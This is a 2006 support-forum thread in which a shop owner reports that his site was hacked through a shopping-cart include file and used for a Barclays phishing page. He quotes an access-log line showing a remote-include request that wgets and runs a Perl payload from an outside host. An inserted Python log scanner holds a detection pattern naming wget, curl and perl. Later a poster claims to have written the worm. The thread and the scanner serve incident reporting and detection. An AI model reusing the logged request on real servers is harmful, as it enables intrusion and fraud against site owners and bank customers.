Guest Ian MacMillan
Posted March 15, 2006

Got this from my hosting company today. I was using CC3 3.09 at the time, now up to .10.

Dear Ian MacMillan, (Customer ID: 6637673)

It has come to our attention that your web space has been hacked and used to set up a phishing site: .ibank.barclays.co.uk/

This folder's permissions have been changed to 000 so that you can delete the necessary files in the web space. Please remove this folder and also update any and all scripts and/or applications running within your web space.

access.log.09.gz:63.247.77.98 - - [01/Mar/2006:16:47:16 -0500] "GET /includes/orderSuccess.inc.php?cmd=killall%20-9%20perl%3Bwget%20elx.vr0k.com.ar%2Felx.1%2 0-O%20%2Ftmp%2F.i%3Bperl%20%2Ftmp%2F.i%3Brm%20-f%20%2Ftmp%2F.i&glob=1&cart_order_id=1&glob[rootDir]=http%3A%2F%2Felx.vr0k.com.ar%2Fcmd.txt? HTTP/1.1" 200 160 www.rockinghamjunctionmodels.com "-" "-" "-"

--

The above was taken from your access logs. It shows that /includes/orderSuccess.inc.php was used to perpetrate the hack.
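Added example, not part of the original thread or of the shop software's code: a small access-log check for the two things visible in the request quoted above, a query parameter whose decoded value is a remote URL and a parameter carrying shell commands. The function names, the pattern list and the sample lines (documentation-range addresses, example.invalid host) are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Request field of a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
# A parameter whose decoded value starts with a URL scheme (remote include).
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)
# Shell separators or downloader/interpreter names in a decoded value.
# Illustrative pattern list (an assumption), not a complete signature set.
SHELL_RE = re.compile(r'[;|`]|\b(?:wget|curl|perl)\b', re.I)

# Constructed sample lines (documentation-range IPs, placeholder host).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Mar/2006:16:47:16 -0500] "GET /includes/orderSuccess.inc.php'
    '?cmd=wget%20example.invalid%2Fx&glob=1&cart_order_id=1'
    '&glob[rootDir]=http%3A%2F%2Fexample.invalid%2Fcmd.txt? HTTP/1.1" 200 160',
    '203.0.113.9 - - [01/Mar/2006:16:50:02 -0500] '
    '"GET /index.php?act=viewProd&productId=12 HTTP/1.1" 200 5120',
]

def inspect_line(line):
    """Return (reason, parameter, decoded value) findings for one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    # Everything after the first '?' is the query string.
    query = match.group(1).partition('?')[2]
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            findings.append(('remote-url-in-parameter', name, value))
        elif SHELL_RE.search(value):
            findings.append(('shell-command-in-parameter', name, value))
    return findings

def scan(lines):
    """Return {client address: findings} for every line with a finding."""
    hits = {}
    for line in lines:
        found = inspect_line(line)
        if found:
            hits.setdefault(line.split(' ', 1)[0], []).extend(found)
    return hits

if __name__ == '__main__':
    for client, found in scan(SAMPLE_LOG).items():
        print(client, found)
```

When the input is grep output over rotated logs, as in the host's excerpt, the first field also carries the file name prefix.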

Laico
Posted March 15, 2006

Can you post the orderSuccess.inc.php file in the code tags?

Guest vr0k
Posted July 1, 2006

lol... my first worm ;)

Guest EverythingWeb
Posted July 1, 2006

Pardon me?

Guest vr0k
Posted July 1, 2006

I developed a worm that crawls Google for hosts vulnerable to inclusion. BTW Ian MacMillan, sorry for what happened to your website; some kid found my script and set up that scam s**t.

Guest EverythingWeb
Posted July 1, 2006

Riiight... I don't think we need this discussion here. Thanks, but no thanks. Topic Closed.